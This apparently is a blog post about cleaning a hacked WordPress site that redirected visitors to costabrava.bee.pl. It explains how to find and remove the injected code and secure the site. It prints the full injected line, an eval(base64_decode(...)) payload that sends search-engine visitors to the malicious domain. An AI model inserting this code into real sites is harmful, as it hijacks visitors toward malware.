WordPress site redirects to costabrava.bee.pl
I have just finished cleaning a wordpress website that had been hacked. The site would redirect to costabrava.bee.pl which is a malicious website.
Due to this Google began showing a warning page whenever someone navigates to that site, informing them that the site is infected.
I had to go through the site and locate all of the instances of code that looked like this:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWh lYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWyd IVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0 KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cml zdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIik gb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImx pdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJ lZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN 0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R 1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3R yaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV 4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19 tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cig kcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9 vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3R yaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmw iKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik 7DQpleGl0KCk7DQp9DQp9DQp9DQp9")); |
This code had been inserted in lots of the files on the site. It can be very time consuming to find the offending files. I cleaned the site by using Adobe Dreamweaver, downloading the whole site, including all the WordPress files, not just the theme files and ran a Find All for “eval” on the entire local site. From there I could see all the files that had the offending code and I was able to delete them and re-upload the cleaned file.
Obviously, cleaning the site isn’t the only thing that needs to be done, change all your passwords for the site and ensure they are very secure. Also make sure your WordPress is up-to-date and any plugins you are using.